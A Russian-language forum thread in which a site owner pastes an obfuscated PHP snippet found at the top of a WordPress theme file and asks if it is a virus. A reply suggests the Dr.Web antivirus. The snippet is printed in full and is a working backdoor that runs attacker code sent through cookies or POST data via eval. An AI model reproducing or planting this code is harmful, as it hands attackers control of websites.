Странный код в файле
-
Привет подскажите что это за страный код в начали файла ? это вирус или нет ?
$qff9a = 471;$GLOBALS['i6e2c']=Array();global$i6e2c;$i6e2c=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['s43e04b']="\x79\x41\x68\x47\x71\x37\x43\x73\x2b\x9\x5e\x38\x33\x3a\x3d\x60\x7e\x4e\x21\x75\x6c\x4c\x7b\x45\x2d\x4a\x59\x44\x35\x78\x3f\x25\x30\x70\x4b\x6b\x5f\x6f\x5a\x52\x29\x61\x55\x63\x28\x6e\x34\x7d\x4f\x26\x4d\x49\x7a\x2c\x6d\x3b\x40\x57\x53\x42\x39\x51\x3e\x48\x50\x77\x2a\x36\x7c\x20\x24\x74\x72\xa\x62\x56\x27\xd\x5d\x3c\x2f\x64\x58\x22\x67\x66\x23\x5c\x5b\x46\x6a\x54\x31\x69\x65\x76\x32\x2e";$i6e2c[$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][96]]=$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][2].$i6e2c['s43e04b'][72];$i6e2c[$i6e2c['s43e04b'][29].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][5].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][46]]=$i6e2c['s43e04b'][37].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][81];$i6e2c[$i6e2c['s43e04b'][19].$i6e2c['s43e04b'][60].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][60]]=$i6e2c['s43e04b'][7].$i6e2c['s43e04b'][71].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][20].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][45];$i6e2c[$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][94]]=$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][45].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][36].$i6e2c['s43e04b'][7].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][71];$i6e2c[$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][81]]=$i6e2c['s43e04b'][7].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][20].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][52].$i6e2c['s43e04b'][94];$i6e2c[$i6e2c['s43e04b'][81].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][74]]=$i6e2c['s43e04b'][33].$i6e2c['s43e04b'][2].$i6e2c['s43e04b'][33].$i6e2c['s43e04b'][95].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][7].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][37].$i6e2c['s43e04b'][45];$i6e2c[$i6e2c['s43e04b'][81].$i6e2c['s43e04b'][28].$i6e2c['s43e04b'][46].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][41]]=$i6e2c['s43e04b'][19].$i6e2c['s43e04b'][45].$i6e2c['s43e04b'][7].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][20].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][52].$i6e2c['s43e04b'][94];$i6e2c[$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][28].$i6e2c['s43e04b'][46].$i6e2c['s43e04b'][60].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][43]]=$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][7].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][67].$i6e2c['s43e04b'][46].$i6e2c['s43e04b'][36].$i6e2c['s43e04b'][81].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][37].$i6e2c['s43e04b'][81].$i6e2c['s43e04b'][94];$i6e2c[$i6e2c['s43e04b'][0].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][41]]=$i6e2c['s43e04b'][7].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][71].$i6e2c['s43e04b'][36].$i6e2c['s43e04b'][71].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][54].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][36].$i6e2c['s43e04b'][20].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][54].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][71];$i6e2c[$i6e2c['s43e04b'][90].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][67].$i6e2c['s43e04b'][5]]=$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][5].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][46];$i6e2c[$i6e2c['s43e04b'][4].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][81]]=$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][60].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][60].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][28];$i6e2c[$i6e2c['s43e04b'][81].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][81].$i6e2c['s43e04b'][46].$i6e2c['s43e04b'][5]]=$_POST;$i6e2c[$i6e2c['s43e04b'][90].$i6e2c['s43e04b'][28].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][28].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][12]]=$_COOKIE;@$i6e2c[$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][94]]($i6e2c['s43e04b'][94].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][37].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][36].$i6e2c['s43e04b'][20].$i6e2c['s43e04b'][37].$i6e2c['s43e04b'][84],NULL);@$i6e2c[$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][94]]($i6e2c['s43e04b'][20].$i6e2c['s43e04b'][37].$i6e2c['s43e04b'][84].$i6e2c['s43e04b'][36].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][37].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][7],0);@$i6e2c[$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][94]]($i6e2c['s43e04b'][54].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][29].$i6e2c['s43e04b'][36].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][29].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][19].$i6e2c['s43e04b'][71].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][37].$i6e2c['s43e04b'][45].$i6e2c['s43e04b'][36].$i6e2c['s43e04b'][71].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][54].$i6e2c['s43e04b'][94],0);@$i6e2c[$i6e2c['s43e04b'][0].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][41]](0);$e271c71=NULL;$qfe70a=NULL;$i6e2c[$i6e2c['s43e04b'][19].$i6e2c['s43e04b'][67].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][46].$i6e2c['s43e04b'][5]]=$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][28].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][28].$i6e2c['s43e04b'][5].$i6e2c['s43e04b'][24].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][5].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][24].$i6e2c['s43e04b'][46].$i6e2c['s43e04b'][60].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][24].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][28].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][24].$i6e2c['s43e04b'][5].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][81].$i6e2c['s43e04b'][46].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][5].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][67].$i6e2c['s43e04b'][5].$i6e2c['s43e04b'][92];global$u6f1c2e47;function b939eb25($e271c71,$o094c62){global$i6e2c;$x2d81e="";for($e29dc95a=0;$e29dc95a<$i6e2c[$i6e2c['s43e04b'][19].$i6e2c['s43e04b'][60].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][60]]($e271c71);){for($b49c=0;$b49c<$i6e2c[$i6e2c['s43e04b'][19].$i6e2c['s43e04b'][60].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][60]]($o094c62)&&$e29dc95a<$i6e2c[$i6e2c['s43e04b'][19].$i6e2c['s43e04b'][60].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][60]]($e271c71);$b49c++,$e29dc95a++){$x2d81e.=$i6e2c[$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][96]]($i6e2c[$i6e2c['s43e04b'][29].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][5].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][46]]($e271c71[$e29dc95a])^$i6e2c[$i6e2c['s43e04b'][29].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][5].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][46]]($o094c62[$b49c]));}}return$x2d81e;}function e7024($e271c71,$o094c62){global$i6e2c;global$u6f1c2e47;return$i6e2c[$i6e2c['s43e04b'][4].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][81]]($i6e2c[$i6e2c['s43e04b'][4].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][81]]($e271c71,$u6f1c2e47),$o094c62);}foreach($i6e2c[$i6e2c['s43e04b'][90].$i6e2c['s43e04b'][28].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][28].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][12]]as$o094c62=>$b5fef87d){$e271c71=$b5fef87d;$qfe70a=$o094c62;}if(!$e271c71){foreach($i6e2c[$i6e2c['s43e04b'][81].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][81].$i6e2c['s43e04b'][46].$i6e2c['s43e04b'][5]]as$o094c62=>$b5fef87d){$e271c71=$b5fef87d;$qfe70a=$o094c62;}}$e271c71=@$i6e2c[$i6e2c['s43e04b'][81].$i6e2c['s43e04b'][28].$i6e2c['s43e04b'][46].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][41]]($i6e2c[$i6e2c['s43e04b'][90].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][67].$i6e2c['s43e04b'][5]]($i6e2c[$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][28].$i6e2c['s43e04b'][46].$i6e2c['s43e04b'][60].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][43]]($e271c71),$qfe70a));if(isset($e271c71[$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][35]])&&$u6f1c2e47==$e271c71[$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][35]]){if($e271c71[$i6e2c['s43e04b'][41]]==$i6e2c['s43e04b'][93]){$e29dc95a=Array($i6e2c['s43e04b'][33].$i6e2c['s43e04b'][95]=>@$i6e2c[$i6e2c['s43e04b'][81].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][74]](),$i6e2c['s43e04b'][7].$i6e2c['s43e04b'][95]=>$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][97].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][24].$i6e2c['s43e04b'][92],);echo@$i6e2c[$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][81]]($e29dc95a);}elseif($e271c71[$i6e2c['s43e04b'][41]]==$i6e2c['s43e04b'][94]){eval/*e0d527d*/($e271c71[$i6e2c['s43e04b'][81]]);}exit();} ?><?php wp_nav_menu( array( 'theme_location' => 'sidebar-menu', 'menu_class' => false, 'menu_id' => false, 'container_class' => 'nav', 'container_id' => false ) ); ?> <div class="anons"> <h3>Анонсы</h3> <a class="sorder-desc" href="/?sorder=ASC">Сортировка по дате: <i class="fa fa-arrow-down" aria-hidden="true"></i></a> <a class="sorder-asc" href="/?sorder=DESC">Сортировка по дате: <i class="fa fa-arrow-down" aria-hidden="true"></i></a> <ul> <?php $posts = get_posts( array( 'numberposts' => 5, // тоже самое что posts_per_page 'offset' => 0, 'category' => 3, 'orderby' => 'post_date', 'order' => 'DESC', 'include' => '', 'exclude' => '', 'meta_key' => '', 'meta_value' => '', 'post_type' => 'post', 'post_mime_type' => '', // image, video, video/mp4 'post_parent' => '', 'post_status' => 'publish' ) ); foreach($posts as $post){ setup_postdata($post); $tags = wp_get_post_tags($post->ID); echo ' <li> <div class="anons_content_img"> <a href="'.get_the_permalink().'">'.get_the_post_thumbnail($post->ID).' </a> <small>'.get_the_date('d.m.Y').'</small> </div> <div class="anons_content_post"> <a href="'.get_the_permalink().'" class="anons_content_post_firm">'.get_the_author_meta( 'nickname', $post->post_author).'</a> <a href="'.get_bloginfo('url').'/tag/'.$tags[0]->slug.'" class="anons_content_post_power">'.$tags[0]->name.'</a> <p><a href="'.get_the_permalink().'">'.my_sub(get_the_title(), 80).'</a></p> </div> </li> '; } wp_reset_postdata(); ?> </ul> </div> <div class="comments"> <h3>Последние комментарии</h3> <ul><?php wp_recentcomments(); ?></ul> </div>
-
Я бы профессиональным антивирусом назвал Dr.Web (у меня стояла лицензия одно время на винде, сейчас на линукс переехал). Он моментально реагировал на опасности внутри кода какого-нибудь плагина.
У них еще есть бесплатная утилита: https://free.drweb.ru/cureit/
А стандартный виндовый антивирус в Win10 в упор не видел вредоносного кода, когда я в него его «носом тыкал».
- Тема «Странный код в файле» закрыта для новых ответов.